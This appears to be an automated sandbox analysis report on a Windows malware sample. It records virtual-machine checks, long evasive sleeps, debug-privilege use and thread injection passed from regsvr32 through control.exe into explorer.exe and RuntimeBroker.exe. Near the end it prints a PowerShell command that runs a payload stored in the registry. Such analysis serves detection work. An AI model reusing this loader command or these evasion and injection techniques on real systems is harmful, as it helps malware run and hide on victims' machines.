Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\RuntimeBroker.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3950
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 6556 Thread sleep time: -1667865539s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_001C3512
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E54CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_00E54CF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00E5B88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E65518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00E65518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00E5834C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6AACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B6AACC
Source: C:\Windows\explorer.exe Code function: 37_2_03B67500 FindFirstFileW, 37_2_03B67500
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E516E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00E516E1
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local
Source: explorer.exe, 00000025.00000000.455635296.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000026.00000000.435135161.000002413A440000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.457597644.0000000008C56000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWt
Source: explorer.exe, 00000025.00000000.461375518.000000000DC9F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000002.566477532.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.456379955.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000025.00000000.449264209.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000019.00000002.383288705.00000284FC4C1000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.456379955.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000025.00000000.454294309.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5505D RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00E5505D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E51F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_00E51F12

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: 250000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 30B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EB0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3060000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: EAE000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 30B0000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 6684 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 5700
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5796
Source: C:\Windows\explorer.exe Thread register set: target process: 4308
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6457212E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 250000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6457212E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3060000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: EAE000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 30B0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8F7000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8DFD4F1000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
